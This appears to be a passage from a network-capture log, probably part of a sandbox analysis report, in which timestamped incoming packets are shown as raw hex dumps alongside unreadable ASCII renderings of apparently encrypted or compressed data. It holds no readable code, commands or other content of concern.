                                                                              2023-10-26 07:45:59 UTC7791INData Raw: 18 71 3f dd e7 d6 27 45 8e 2d ac dc 92 f6 26 45 29 51 25 d5 09 43 ca 2e 75 d9 46 e4 e7 26 3c 53 21 84 d2 ee e2 22 a3 10 85 fc 97 f7 60 33 cf 91 d8 5f 72 b9 5a 92 db 84 4b 12 aa fb 75 d5 f0 f8 28 b5 1a b2 dc 9b 72 f7 36 22 16 44 33 2b b6 fa 4a b1 ed 3a dc 59 e7 b7 e5 bc a5 91 21 05 3a cc 88 ff 9d ff 16 4a 55 08 77 6e f1 7a 2d ac 96 bf 61 4a 31 f9 77 60 1a 44 29 f4 11 e3 c6 7a e8 e0 b4 ff cb 08 05 6e 47 7e 02 ea 28 d2 ee 9d 65 a2 21 2d 97 ce f3 b6 27 f9 59 97 92 bf be f6 f2 4e 84 b7 00 3d f5 fc 4a a0 25 97 62 8e dd 6c f4 b5 45 8e 26 96 c9 5e cc a7 56 34 13 c7 ea 28 4d f1 9f 4c 7e d3 0e 2d 95 7e 0b 18 2b df 9c 22 ef f4 06 82 27 6d 7f 74 3d 79 65 c0 d1 17 24 d8 1d 08 3f 4e d9 d8 7a 84 37 bf 29 8f e9 10 39 49 93 ba a3 3c 4b b8 33 58 e4 b2 4e a1 c6 45 8b 36 2a
                                                                              Data Ascii: q?'E-&E)Q%C.uF&<S!"`3_rZKu(r6"D3+J:Y!:JUwnz-aJ1w`D)znG~(e!-'YN=J%blE&^V4(ML~-~+"'mt=ye$?Nz7)9I<K3XNE6*
                                                                              2023-10-26 07:45:59 UTC7807INData Raw: 45 e1 7f a3 d3 92 a1 dc 6e a6 6f 96 a8 15 b4 d5 ae be f6 c7 92 af cf 89 6c 14 fc 30 9c db 73 4f 88 d9 b9 6e d5 03 b7 59 50 df 41 25 33 31 75 1c 9c 9f 51 28 44 f7 bf fc 91 b5 ee 20 2c c5 7f 32 35 10 7e 14 ab b5 fc 2a 2d 86 25 03 2a ce 2e 4f bf 09 f1 f7 76 dc 7a 89 9c 46 65 48 14 df e0 45 29 2b bf 74 e2 ed 23 44 9c fa b2 14 54 18 4b 86 a2 d8 76 80 5b 48 d9 a9 32 da 8c ff f3 08 4e 15 c5 92 ea 56 44 ed 20 9e a9 51 0b 41 5f 77 40 d3 e9 0f 99 95 9b d7 1d aa e2 7b ae a5 4e 7c 9d 7f 09 c8 ff 16 ba b7 90 4c b0 64 b7 76 e4 e7 f2 79 f9 80 42 03 01 45 82 89 41 20 2b 02 02 39 2d 88 77 96 68 9f 7c 4b 59 2d 79 c1 97 17 13 eb 38 db 3f bc 95 53 dd ca e8 4b a8 b3 93 29 c8 6e a8 56 2d 36 ec 11 b5 71 e6 25 55 42 f6 57 53 0f a5 09 90 5d 33 40 da 35 5f 59 64 45 f1 22 79 3f 54
                                                                              Data Ascii: Enol0sOnYPA%31uQ(D ,25~*-%*.OvzFeHE)+t#DTKv[H2NVD QA_w@{N|LdvyBEA +9-wh|KY-y8?SK)nV-6q%UBWS]3@5_YdE"y?T
                                                                              2023-10-26 07:45:59 UTC7823INData Raw: 10 67 4c a5 f8 bb a3 3d 88 30 39 cb f9 1e d5 96 4c 4c e4 b9 89 85 41 b5 ea c2 6d ea 6e 62 b7 71 54 45 f1 fa 39 43 2f 9c eb 25 a2 3d 40 11 e9 45 27 08 2a ff 38 d0 cf 01 97 96 08 fd f1 c1 76 42 25 22 75 96 db 4e 25 bf 64 92 56 3e bb cd f8 66 8f 5b a5 05 3f e7 d1 5b 71 24 31 f7 4a 8a 16 21 ff 9d 65 6c 38 4e f9 e0 4b ba c5 c6 ee 29 46 2b 85 16 e2 a6 d7 e8 95 4b e3 db c9 2d d1 37 cb 74 d6 b4 fa fa dc 80 21 5e d8 a9 8c 96 56 1b f8 b2 a2 eb dd c7 58 8b 01 ff 13 a9 4a 0c fb 61 96 09 d3 3b 8a 95 2d e2 b2 72 09 28 d7 c5 a4 9c 02 25 5e cf e9 7c 9e ad 0b ca 5e 8f 52 55 f9 bb 95 f1 0e 17 01 d4 a9 73 d7 e8 6b a2 40 7f 16 3c fd 2b 94 28 13 bf aa 9d 66 2e 98 41 e7 5a 04 2d 13 79 c8 d2 eb f7 15 45 88 7f b7 5b 50 2d c2 b6 40 9d 09 a8 e2 95 51 bc 49 5c 0d e4 e3 8c b6 63 5a
                                                                              Data Ascii: gL=09LLAmnbqTE9C/%=@E'*8vB%"uN%dV>f[?[q$1J!el8NK)F+K-7t!^VXJa;-r(%^|^RUsk@<+(f.AZ-yE[P-@QI\cZ
                                                                              2023-10-26 07:45:59 UTC7839INData Raw: 74 04 4c 39 26 ff e3 7f 8a ff 0d 44 db 54 f9 7f 73 39 b9 27 40 01 e9 40 b7 4f d1 aa 8b 34 49 93 4a f6 de 13 28 39 eb 8d 11 2f b0 65 35 93 1c 0a ca 40 33 27 5c b0 2d e2 3c 76 bf eb c1 cd f0 2e dd 79 75 33 44 fb eb 2d 69 97 22 d2 b8 31 a2 ee d6 3e 65 f6 aa f7 e4 4e 65 45 eb 94 8e ba 28 ed 05 4a 04 98 ca 01 5a f0 ad 34 de bb cb b6 de 5f b7 e0 27 25 7d ee 86 42 f6 5f bc b7 a1 c9 f0 26 a2 25 40 db ee a7 14 40 82 c8 57 79 b6 61 45 33 75 c2 ce 27 9d 01 d4 18 8a 54 2e 04 0c f1 88 b2 95 95 92 5b b2 85 c9 e0 75 67 fa a5 fe b4 c5 e8 02 07 44 09 37 73 ab 1e 4d 92 d0 eb a7 c5 4a 62 28 f0 ab 0e 81 24 4c 89 d1 7f d9 3b 05 d1 04 9a 21 f8 ea f9 99 89 d8 fd 31 d6 8b 6f e0 f9 ea 97 b8 3d 2d 10 84 97 b0 95 09 cf a6 55 b7 2b df 0b c4 7e f1 e2 89 d9 7d c5 eb 27 7e b4 25 3b 0f
                                                                              Data Ascii: tL9&DTs9'@@O4IJ(9/e5@3'\-<v.yu3D-i"1>eNeE(JZ4_'%}B_&%@@WyaE3u'T.[ugD7sMJb($L;!1o=-U+~}'~%;
                                                                              2023-10-26 07:45:59 UTC7855INData Raw: b3 08 af 54 16 a4 16 05 23 e9 1d 04 3b 09 e1 af e8 40 d6 52 b6 af c2 fb c1 dd 1c 0b 9f 65 07 12 e6 ae f2 b2 d2 57 5d ff cb 72 67 80 df ab 58 0f 97 67 c8 27 d4 76 e9 58 cc e7 2b ea 2d d3 65 ca 90 58 de 4e ea ca 68 5b 98 7f c2 4a 10 a3 70 92 af 9d 0b a7 58 5d c2 6b 77 56 ee e9 54 ee 64 fb f8 c6 a2 c4 51 2e 09 21 de 51 09 49 fd 6c 60 4d 3f 38 de 89 c7 0f d6 08 5a 1a 23 55 f4 01 5a 5b e6 a5 8b b9 4c a0 e6 f9 9f f9 0a 4b fd 31 d2 cd 7f bc 0f 5f b9 c3 79 71 ff b5 94 8f b0 ee 4f 3b d9 e0 30 35 f7 3f 59 ac a5 4a 5e 6b ea 48 25 56 c6 72 76 15 25 ee 63 81 1b c9 97 9a e0 04 ee 3e 49 eb fd 3d 96 ff 99 b5 af 73 dc 3b 5a 56 b1 c4 c9 fe 8c 30 c0 4f 20 cb 50 09 4c 31 fb 5c 70 a6 ec 28 c4 65 ff 9a d1 53 ab 29 a2 2f a0 25 81 4b e8 eb cb 2c 4b ff 10 8b 86 4e ca d2 5b cc cc
                                                                              Data Ascii: T#;@ReW]rgXg'vX+-eXNh[JpX]kwVTdQ.!QIl`M?8Z#UZ[LK1_yqO;05?YJ^kH%Vrv%c>I=s;ZV0O PL1\p(eS)/%K,KN[
                                                                              2023-10-26 07:45:59 UTC7871INData Raw: 65 26 85 f7 dd 16 21 63 6a b6 51 16 0d 20 39 05 6e ed 6c 9a 94 4e 93 b5 66 f5 a2 e4 5f f4 e3 27 75 c7 9f 22 28 92 b1 bf 19 e1 5f 44 c0 ba e2 b6 d2 e9 38 df 88 c6 01 84 41 09 33 ba 9b 10 4d ba 4b 71 4c 21 de 6b f2 d3 90 b4 5b 9f de 29 ef 34 27 d6 5b ad 55 38 8e 09 f0 95 ba 6c 51 55 a8 ed 7a c9 25 29 c3 d3 ad af fc b8 ad fc 4f 52 7f 3a 65 9a 8f f4 8d 2d 51 e4 ad e5 e4 1c ff 61 13 eb 62 9a de d7 b8 bc 09 f9 b5 db d3 17 44 ff 4b f6 e9 4e 82 97 32 f8 57 c2 83 ff 30 7b 21 f0 9d ec 53 27 89 f2 3b 76 5c c7 55 13 09 c6 ee dd 46 44 30 eb 3c 84 e9 a0 49 4c 31 4e cb 98 1c 44 5b 09 c7 c5 d4 08 bb 69 2c c1 04 2d fd 9e 91 08 88 d0 af 4a da 09 93 47 1c 25 74 1c c0 81 32 fc ef 25 6c 72 fd c5 35 24 35 a5 f5 9c 92 95 46 9c 12 45 8a 38 aa 09 15 bc ff ec 46 98 71 97 1c af 9d
                                                                              Data Ascii: e&!cjQ 9nlNf_'u"(_D8A3MKqL!k[)4'[U8lQUz%)OR:e-QabDKN2W0{!S';v\UFD0<IL1ND[i,-JG%t2%lr5$5FE8Fq
                                                                              2023-10-26 07:45:59 UTC7887INData Raw: 07 2e a6 60 6e 29 c5 65 6c 74 e8 04 53 ea 82 c0 61 cd dc 07 c6 15 c0 ed 3b e1 6b e0 86 0c 4c 2d be 8e 79 c4 e0 b8 50 c2 be fd 7c 7a d9 6d 34 5a 2e e2 dc 00 b9 6d 34 8a f9 ff 4f 14 53 a7 55 a4 87 11 e3 70 7d 2e c0 8a 05 16 e9 31 4d 0b fa b0 15 7f 38 c9 11 7c 18 88 0c 09 0a 8c 68 5a f3 f1 b1 09 9a 48 d5 36 76 8b 04 7e b1 96 e7 46 ea b2 f3 7c 07 fc eb ff e3 2a 33 d9 95 90 2d 43 0f 1d 84 66 f5 31 5e e7 53 80 4e 69 c6 b9 79 37 9e f6 be 1c d4 e1 ff 29 01 80 e4 0b b5 04 67 f9 01 fb ff 33 e1 3f 35 e9 3a b9 bf 40 c6 92 63 eb 40 12 f4 00 1c e7 1b 47 ec 79 06 3d e0 7d df 4e 4d 59 7b f0 91 14 05 22 5a 00 6c d8 0f 85 ec 58 ed ff fa 65 48 a8 e7 7b 1b 82 0a b5 62 da d4 69 d2 56 d8 6b 85 7b e5 7c 5e e8 76 98 05 12 b7 c0 22 b7 30 5b 13 e7 8b 40 4f fc 80 a1 ef 88 2a ce a3
                                                                              Data Ascii: .`n)eltSa;kL-yP|zm4Z.m4OSUp}.1M8|hZH6v~F|*3-Cf1^SNiy7)g3?5:@c@Gy=}NMY{"ZlXeH{biVk{|^v"0[@O*
                                                                              2023-10-26 07:45:59 UTC7903INData Raw: 44 e7 60 75 0e 1e 17 f7 af 62 8d 83 3b cd a1 9e c9 ca a5 16 17 bd 73 49 0b 0d 80 9e 8b 94 a4 6b d8 32 4a 2b 35 e4 eb f1 69 08 a6 e7 b7 dc fb 72 77 b0 f1 29 f6 9d d9 fe 49 71 62 27 fd 14 68 d6 66 82 10 f6 d4 02 73 4e 83 ea 8b 92 5b bc 52 c9 ec 57 da 83 4e c6 dd 2a e9 e0 3a da a6 25 e6 66 72 ff 42 c0 ca 65 f7 29 be 4b 7f 89 fc 79 9a 6b 31 54 2b 3a 82 52 ef dd d3 77 25 fd 32 63 77 59 b4 96 f0 d9 c7 78 6e c1 e2 41 33 3f 32 4c 96 eb d8 59 ef 9d c5 2a 08 c2 90 49 d5 b2 6a a9 72 75 4e 83 80 11 41 21 51 3f 66 71 07 e5 f6 2a b2 15 84 c7 d0 ae 39 51 28 76 d4 7a 02 2f ab bb e4 5f c5 e1 25 d5 b1 26 e8 31 8f 6c c6 2d f3 f5 14 a5 5d 4c f2 5e b1 16 3a ae 3c 65 44 25 8a 28 c0 2a bd 0f 2c 86 34 57 ca 06 a5 5e 1d 58 e3 10 91 77 92 ea ea a7 a5 49 87 c9 c9 55 e7 8f a7 6c b2
                                                                              Data Ascii: D`ub;sIk2J+5irw)Iqb'hfsN[RWN*:%frBe)Kyk1T+:Rw%2cwYxnA3?2LY*IjruNA!Q?fq*9Q(vz/_%&1l-]L^:<eD%(*,4W^XwIUl
                                                                              2023-10-26 07:45:59 UTC7919INData Raw: f7 ac ce c0 31 f4 9d b8 57 d6 d9 ff 39 da 2d fb 48 77 a3 cf 87 89 65 46 17 48 af 75 d1 fe 20 20 44 8a 36 97 f8 21 5f 27 61 6a 09 ff 81 96 f5 e4 c5 73 7e 3e c4 98 eb a3 cb 4d b8 4f e3 58 96 51 ef 90 92 c4 41 12 a7 b8 ae b4 fa 9d 3d 3a a7 2c 5b eb 24 7b c5 60 fb 64 1d ae 14 f8 47 4e 8b 8e 58 6a 27 03 5f 15 a5 23 1d 27 cf fe af 74 2c c4 11 ba 8d e7 93 0c d7 ea a3 5a 8b d3 7d 65 3d 2f 70 3c 9f db c9 2d ce 90 48 e1 4f c6 31 f5 63 fa 2d 97 31 19 10 2e 9d cf 89 43 21 c8 ba 2b df 09 7b 12 2e f7 42 33 09 c0 7d c7 55 17 e1 ac 4e ce dd 77 71 4f 2d 10 58 8c 1a 97 dc 36 24 8b 27 77 3a 4e 42 92 57 9c 2e d6 d5 39 c9 7e 30 92 41 33 1f f5 3b f7 26 2f e4 1b 81 f4 af 74 41 bb b6 52 5e ad 38 5b aa 29 fe fe df d1 72 6b ec ac 12 41 03 1b fe cd 56 42 58 dc ff da cb 5b e6 f2 e4
                                                                              Data Ascii: 1W9-HweFHu D6!_'ajs~>MOXQA=:,[${`dGNXj'_#'t,Z}e=/p<-HO1c-1.C!+{.B3}UNwqO-X6$'w:NBW.9~0A3;&/tAR^8[)rkAVBX[
                                                                              2023-10-26 07:45:59 UTC7935INData Raw: c6 fc 25 e5 bf 9c 67 e2 13 4d 31 e4 b7 22 4e fc bd 47 e6 12 29 d6 28 cc 81 27 c6 06 19 88 0e ef da f2 7f 67 31 22 c9 97 d1 54 45 e0 fa e3 7a 93 a2 34 4e eb 81 6b f3 3f 37 86 38 02 4e fd 59 c9 48 77 51 c4 49 55 f3 17 16 f5 e3 b8 58 be 5a a9 dc d3 b6 07 29 c9 07 17 cb ee dc 4e cd 9d 47 11 27 57 3a ff 46 62 95 c3 e5 9f 84 d9 bb e2 d2 99 1a d4 7a 84 c5 eb ca d2 4a 56 d5 af ca ed 5f fa 64 b8 f5 d8 2a b2 8a 5a f7 da 58 c1 05 d4 44 8a 12 ab 08 5c c8 27 d0 95 bd 45 d0 a5 d1 04 ad f4 f2 25 71 92 49 00 ba 31 40 fa 19 bf 14 c9 4f eb 64 49 bf fc ce b7 e7 0d 6b 51 13 44 a6 a8 6f c1 0b 4d 09 e5 3f b6 83 77 95 d4 3a c9 da 69 97 3a 37 d6 6c 25 e5 da a5 ea ac ba 34 5e 8b 08 fc 8f 12 c3 70 39 4d 31 ef b5 ce 30 9d c2 b5 55 59 ba af 58 82 95 e5 cf af 2b db b8 51 21 c1 9d 1a
                                                                              Data Ascii: %gM1"NG)('g1"TEz4Nk?78NYHwQIUXZ)NG'W:FbzJV_d*ZXD\'E%qI1@OdIkQDoM?w:i:7l%4^p9M10UYX+Q!
                                                                              2023-10-26 07:45:59 UTC7951INData Raw: a5 ff 2b b1 fd e7 e0 8b c5 80 6d e3 af 5b e7 a7 7f 46 64 4f ce ae 2d 87 42 c2 33 75 79 72 13 54 74 f6 f7 39 5b e1 09 23 0a d3 29 0b ce 7c 18 99 c0 21 0d 66 11 20 33 57 ee df 4e e5 02 cf d9 41 5a 87 46 16 e9 2f 0e 13 ea 38 38 f0 91 2f 92 d0 f9 2b c9 5a 6e f7 ee c8 9f 79 67 cb 5b bf a7 f5 02 b9 cb 20 56 c3 5a 5f 50 2c 27 01 d6 4e c5 25 21 d0 53 37 24 e5 10 d7 93 9c 9a cf 43 40 5f 84 aa e2 df 91 a5 4e af 39 19 f9 cc 3f 8b ee 27 08 6c d5 b0 43 97 5b 25 92 05 8c b9 ee 4b 40 8f 0f 4b 61 93 cf 3f 15 17 81 09 54 c2 f5 1c 19 b7 51 a4 a5 f3 c9 13 f7 8d 6c 3a 34 3c ee 09 cf 8b c6 91 4b c6 eb cb 51 5b a9 ae d1 ee 93 17 fe a8 e4 25 f2 c7 76 25 55 cc 2d c0 ea a9 37 b9 30 4c a4 de 4b ee e9 2f d3 ef d9 a9 7c 67 93 0b 27 1e 75 94 51 4f e6 a8 60 e4 82 f4 e7 57 d6 9c 45 f2
                                                                              Data Ascii: +m[FdO-B3uyrTt9[#)|!f 3WNAZF/88/+Znyg[ VZ_P,'N%!S7$C@_N9?'lC[%K@Ka?TQl:4<KQ[%v%U-70LK/|g'uQO`WE
                                                                              2023-10-26 07:45:59 UTC7959INData Raw: 8c 17 e7 75 6f 75 74 4a 85 10 9a c9 2c 7e ba f2 bf 32 af 0b bd dd 84 9f fe b7 d6 17 01 39 b0 c9 49 9d df ba bf fd 94 51 9d 5f 1e 50 25 05 3e d1 94 c9 f5 9a b9 59 09 68 72 92 8b af d8 1c 4c 2f 09 ca 4c 20 9d 70 57 9d 47 15 2f 5d b1 49 c3 66 56 5b 8d f8 6b 12 4d ab c5 be 84 be bb ca 00 4a f8 99 5f ca c5 4b 99 4d 2f a2 58 d7 99 d3 28 73 89 33 7d 89 55 d5 7b 40 09 c0 01 4e 75 4f e1 a8 ae f4 be f9 68 da 62 b2 aa 10 11 41 03 4e 18 a1 ef 0a e2 5b b9 2d 2f 04 c5 a8 b4 4f e9 d6 96 ad 24 27 35 dd 47 81 25 de c9 e8 56 45 35 a2 ac 84 f0 20 ea 2d 98 fa f3 14 a5 f3 4a 09 e8 f0 5c 8b 79 c3 51 3a 09 f1 2a d9 86 2c 37 0b 9e e2 47 fd 66 37 26 4e 01 c5 5a 59 78 44 c6 ae ec e1 b0 41 31 1e b6 61 ef e9 d0 c5 3f 85 41 31 1a fa 2d 1e 50 6c 5e ae 29 4e 0e be 28 8c 41 9d 5f 12 b3
                                                                              Data Ascii: uoutJ,~29IQ_P%>YhrL/L pWG/]IfV[kMJ_KM/X(s3}U{@NuOhbAN[-/O$'5G%VE5 -J\yQ:*,7Gf7&NZYxDA1a?A1-Pl^)N(A_
                                                                              2023-10-26 07:45:59 UTC7975INData Raw: 11 58 03 0f 97 56 c7 50 2b 0b 9d 59 0b 62 21 0a fd 71 48 c0 36 14 17 8f 96 dd c9 d5 31 a4 4d 6e e3 9a 4e a9 b6 df 67 5f ee db 5b 12 f2 ff 4f eb 4c 6d 66 2a f0 5e 47 13 81 af a6 f7 21 d1 c9 68 12 d2 28 27 e9 22 9c 11 97 5d 36 46 56 04 ab 34 19 81 ba b9 af f2 0a 79 d5 a5 dd 18 31 c1 64 b6 c4 69 7f 9c a8 25 2b 21 e7 27 3a 2d 26 fc 91 72 70 c6 c9 56 19 75 65 26 4f e4 63 08 8e 2d 41 bf f4 ff e3 0e e9 1d 04 18 1d 47 90 9f 24 04 3e eb f8 68 a5 53 a6 ba ca 66 42 ee 46 ea 76 9d d5 1c 52 70 02 e1 18 01 dd 59 a8 f7 09 f8 41 2a 02 dd 51 d7 fa 70 69 b7 74 f1 ef f3 a8 da 2f 25 f7 14 85 50 2d 30 8b 5f 30 e7 c1 5f c4 c8 16 d4 fe 39 4a 7e b8 39 b9 38 60 5b f8 62 b6 23 f7 06 60 4f 3d cc ea 0c a8 35 2f 01 88 e9 07 ab 0c b4 25 ad 6f a6 a5 b5 7c 6c 58 41 8a 32 02 3c 73 24 95
                                                                              Data Ascii: XVP+Yb!qH61MnNg_[OLmf*^G!h('"]6FV4y1di%+!':-&rpVue&Oc-AG$>hSfBFvRpYA*Qpit/%P-0_0_9J~98`[b#`O=5/%o|lXA2<s$
                                                                              2023-10-26 07:45:59 UTC7991INData Raw: cd 3f 7f a7 44 50 25 d2 97 7f 18 d0 29 d6 16 41 b4 8f bc 2d da f8 f9 b6 48 fb 13 f8 ed d2 82 44 08 27 56 d5 e8 a5 27 7c 90 7a 77 38 17 f6 20 a4 07 97 ee cf 27 29 d7 42 66 75 64 fc 4a e0 28 2f ca 97 b1 dc 22 85 75 49 31 d0 f2 9e 89 c2 df d3 01 9d f1 27 45 b6 ae 4a cb 71 a3 16 fd 74 26 ba e8 29 b4 aa a3 d3 4b a1 05 4b 03 4b b9 cf da 5e 5d 5c f8 73 bc ba 38 82 4d 2b 31 ed a4 af 0b 3b d5 ba 84 5c e7 26 7d af 4f ec 15 ea 83 8b c3 7f c5 00 85 45 29 23 14 d1 b1 55 da 3a bb 72 67 80 56 f9 5a 5f c2 9c 55 f6 7e e9 3a ab 5f c6 d7 95 56 4b a4 a8 93 e7 e5 9b 3e fd 81 da ed dd b0 54 4c 8b 4f 17 bc 66 a1 cd 10 2d 3c a4 f9 4f d3 12 f7 fe 69 30 6f ed 8e 96 d8 1e 88 95 67 a2 94 c5 7b 90 89 5a 64 d1 04 61 31 ca ae e6 cd 13 63 7d aa 2c 60 f4 9f 19 39 c3 3e ec c7 a4 13 98 d9
                                                                              Data Ascii: ?DP%)A-HD'V'|zw8 ')BfudJ(/"uI1'EJqt&)KKK^]\s8M+1;\&}OE)#U:rgVZ_U~:_VK>TLOf-<Oi0og{Zda1c},`9>
                                                                              2023-10-26 07:45:59 UTC8007INData Raw: bf 2d 47 2b a6 a3 47 a0 17 44 31 f8 be 25 db 42 c0 de 0e 52 46 0b ca a2 e0 7d ee e8 90 42 09 ca fd 79 9d 2f 7d 32 d8 f5 70 49 27 8b 07 fb da ad 82 62 31 c2 5d f9 f9 4e 0b 04 65 6b 2c ff ad 74 9b 52 dd 66 07 32 01 ca 58 d9 5f 4c a6 2f 4d 63 5c 35 12 e9 ff 28 5e c1 fd 4c cd 39 fc e0 e1 4c 01 62 1c 38 d6 15 22 00 39 8a 5e 32 94 fb b1 49 00 12 e3 6d 78 5b 29 e9 5d 38 bd 28 75 0f 8d 4e e2 ff 43 97 88 e1 17 0a 52 e8 1c 07 cd 68 bb 4e fc 40 8b 7f fe 30 fa 33 18 d9 77 57 ee 25 0e 99 01 87 60 14 86 63 38 58 e4 07 10 14 c2 7b 85 b0 19 3a d0 04 60 b3 da 6b 24 b2 df 6b 96 5a d8 36 17 2f 4f 9c b0 68 25 58 f2 74 17 37 06 f9 37 27 bc 76 f5 74 43 60 02 47 f6 ed ef f0 77 c5 1b 50 47 32 6b cf 4d 21 8e 64 a7 2d 40 9b 42 50 bb 4a 2a be 00 02 74 fd a4 4c e7 67 c9 2c 57 01 bb
                                                                              Data Ascii: -G+GD1%BRF}By/}2pI'b1]Nek,tRf2X_L/Mc\5(^L9Lb8"9^2Imx[)]8(uNCRhN@03wW%`c8X{:`k$kZ6/Oh%Xt77'vtC`GwPG2kM!d-@BPJ*tLg,W
                                                                              2023-10-26 07:45:59 UTC8023INData Raw: 31 09 dd cc e3 b5 ba 3a 57 6c 1e 9c 39 6b 7d 69 48 cb 29 a7 93 31 d3 01 cd 3f d9 ea 6f 91 42 8b 75 6b e2 84 93 d2 93 e4 46 b6 58 09 2d 12 31 de ff dc 6d f4 b7 f4 c1 c8 c4 2f d6 8d 7a 7d 73 42 0a c0 0d 07 88 ec 01 87 4d 63 28 3f 09 ee db be a5 db 53 92 ef 28 09 31 5a f3 f8 21 53 f6 c5 01 2f be e0 61 c2 e1 2e 2f 54 23 0f 11 55 4b 0a 00 c4 24 5e 70 0b 8a 77 fc 6b 69 f0 2d 9f f8 81 2f 8f 02 fd 0b 6e dc 87 2d 45 7a 25 5b bf 13 c6 75 14 0b cd f0 f5 16 5b 9d 3a 48 75 d3 34 2d d1 bc a7 dc 16 2d 45 b3 04 66 8b 0b eb 74 aa 84 06 fa 12 e1 27 ba 97 c1 9e c9 f3 f9 37 42 f6 20 79 1c 6a b5 17 0f 35 ea ea 34 e0 be a8 99 b2 f1 b9 f6 db 6c 75 e4 af 35 2b ba 9c 0e eb f3 e5 04 3b 2d b4 3c 59 d7 a8 8e 4b c5 40 ee 8a 89 5f 98 94 cd 45 80 60 23 06 09 d1 3e 95 37 09 c2 a7 85 f6
                                                                              Data Ascii: 1:Wl9k}iH)1?oBukFX-1m/z}sBMc(?S(1Z!S/a./T#UK$^pwki-/n-Ez%[u[:Hu4--Eft'7B yj54lu5+;-<YK@_E`#>7
                                                                              2023-10-26 07:45:59 UTC8039INData Raw: 09 5e c9 b9 53 50 9b d4 5f 49 bf 35 01 85 5f fe 71 e0 21 dc 3b ef 29 30 7a b7 33 5f a9 e3 4b e8 63 e4 af 16 c8 ae 9c 98 e9 e7 3e ec 43 c4 09 cb ba 28 4a ed b5 51 e3 44 09 27 7b 6c ca b4 48 eb 57 6c 9d 5a 20 75 2e ba 99 80 63 ae 2d e4 df 9c 9a 25 31 c8 d2 1f 25 33 2e 77 94 d1 bf db 51 b5 0f da a3 22 f1 bd f8 ed 95 5e 07 e4 f6 aa bc fb e4 e1 b4 42 c9 d6 56 5b 29 57 c9 59 43 93 11 ae 69 c2 3a a7 8b 5b e7 18 26 ca d2 c5 d6 be c5 f2 b8 ba 4c f6 f1 01 0e 60 e6 e2 c9 9e cf d7 16 91 5d 08 38 b4 ea ad bf dd a7 ff 1a 8d 57 ba d1 fb 3c 20 f4 5b 1a ac a8 50 32 c0 ec 21 48 ff 2e d2 e9 78 93 ad 7d 96 ac 65 4b f2 0c 96 f1 7d 08 58 8a 9d 67 9c 2f 75 b1 45 c2 58 25 31 5e d5 fc 56 e2 cf 54 29 c1 44 21 18 22 73 95 a6 4b f1 95 3a ce 4a 04 09 2c d9 0a bb fc 7d 4d 5e 97 a9 c2
                                                                              Data Ascii: ^SP_I5_q!;)0z3_Kc>C(JQD'{lHWlZ u.c-%1%3.wQ"^BV[)WYCi:[&L`]8W< [P2!H.x}eK}Xg/uEX%1^VT)D!"sK:J,}M^
                                                                              2023-10-26 07:45:59 UTC8055INData Raw: 6d 9f af 76 a0 e2 c1 03 4c 1d 97 56 89 58 45 30 b8 d5 95 42 1a dc 44 72 57 94 7e 9d 54 ec 2f f4 a1 e2 c4 3e 47 34 27 f7 96 27 9d fb 28 2b 38 24 c3 e9 7a 99 b8 a0 bd d9 4f 69 fc 7b 26 f3 4b fd 14 be 9b 05 1d 01 fe 96 29 d6 2d 68 3e a6 24 13 f0 88 e8 8e b5 41 68 82 38 35 0f 7e ca 7b 53 d3 5e 8b 92 48 c4 25 22 54 e1 e9 53 aa 25 ba ef d7 6c c9 bf 2b d2 fe f3 52 df 46 4b 95 38 bf 8b 08 b5 f9 92 44 ed bf f6 f1 93 d9 54 49 88 7c 03 b3 06 84 57 aa 72 f9 ea e6 f6 25 63 45 5c f0 4b 5c 03 70 04 24 25 ff e1 fe f4 85 ec 6e c4 e0 ff a4 12 d8 9d 5c ad f2 4b eb c6 5e 40 b7 de 2e 1d bb c5 18 e4 0c e0 cb 9c 16 7b 0e 96 d0 84 8f 9a 19 ce 31 ac 00 25 3f 10 e7 e3 38 47 4b 09 c9 fb 02 d5 10 1e a4 83 70 f5 c6 1c 1b 80 14 0c 68 24 55 94 24 8e e0 fc 33 ba e1 95 03 99 d0 49 b2 64
                                                                              Data Ascii: mvLVXE0BDrW~T/>G4''(+8$zOi{&K)-h>$Ah85~{S^H%"TS%l+RFK8DTI|Wr%cE\K\p$%n\K^@.{1%?8GKph$U$3Id
                                                                              2023-10-26 07:45:59 UTC8071INData Raw: ea d5 65 5e ad d6 2d 25 cc a8 98 1f 4e da 98 b6 33 4f 37 b8 a3 a2 f0 30 f2 20 bf 1c e1 9f ba 5e d7 b2 92 d7 53 5f 1f 31 8b 21 30 f5 b3 c2 bf c5 f5 aa ca 72 49 df d3 8d 90 21 5a 3b 8a aa 4e cd c1 7a 13 0f e9 d2 96 bf 16 20 fd 4a c7 29 cb ab 4e 08 7d f4 93 34 24 be 1f f8 7d 29 ea fd e9 7d 29 31 57 ba 0a 6a ac d4 a0 72 7e 86 2d 67 42 20 ad bc df e9 59 b1 65 02 b8 bf b7 7b dc e4 6b f0 0f bd 71 2a 42 ca 04 65 fb 25 fc c5 c4 c8 bb 70 a5 01 26 ff 4b e7 ac d0 89 c9 55 59 aa ca 6a bc 3b f8 17 09 c9 aa 77 b1 74 c7 bf ec fd b5 fb 9c 49 3f 9f b2 18 7c a4 ad d9 37 6f 12 f9 c5 8b 37 7c c0 27 de c4 70 03 33 cb 1a c7 5f 65 62 a0 e0 bf 47 a6 a6 20 61 45 2b 37 2e b1 2f 3b a2 51 8b e9 79 00 a5 7c 9e 42 c1 f1 55 1c 02 97 10 48 45 31 e3 7f ed 22 c9 ea f7 53 ee a7 19 e9 d3 6d
                                                                              Data Ascii: e^-%N3O70 ^S_1!0rI!Z;Nz J)N}4$})})1Wjr~-gB Ye{kq*Be%p&KUYj;wtI?|7o7|'p3_ebG aE+7./;Qy|BUHE1"Sm
                                                                              2023-10-26 07:45:59 UTC8087INData Raw: 41 62 0e 21 30 75 79 0b a7 ff 09 87 11 6d cc 7b f3 a8 90 fd 26 45 0a 04 ab 36 79 bf 52 ee ac 09 e6 e8 97 78 8a 97 45 5e 2f 89 c0 c5 94 17 66 eb 5e 0d 82 32 7b 5f 76 5d 71 ba 42 31 17 dd 71 2a 4c a2 29 0b 5b ba 18 13 54 df 5b 02 22 21 56 1e 2d 7e ff 14 d8 99 c4 f1 44 f1 28 6f cf 9d 24 e5 99 c6 fd 3b b5 5c 2f f8 28 2b 02 16 ce 3c 41 09 3e 6a 20 de 18 c8 1c 2c e8 52 29 ac 71 52 c4 eb ee ce 60 25 c7 5f ce a0 09 66 35 fd 9b 75 8b e4 77 ba 70 5d c9 60 c6 37 8f 4b ef 05 16 ef 55 e8 b8 16 e2 20 a3 08 97 ae 31 c2 21 fe cf b2 08 60 01 0f af 2d cf 9c 42 eb f8 99 4b ca fb cb 01 5e 74 03 94 ee ea 2d ad 3f ad 96 a4 bd 51 c8 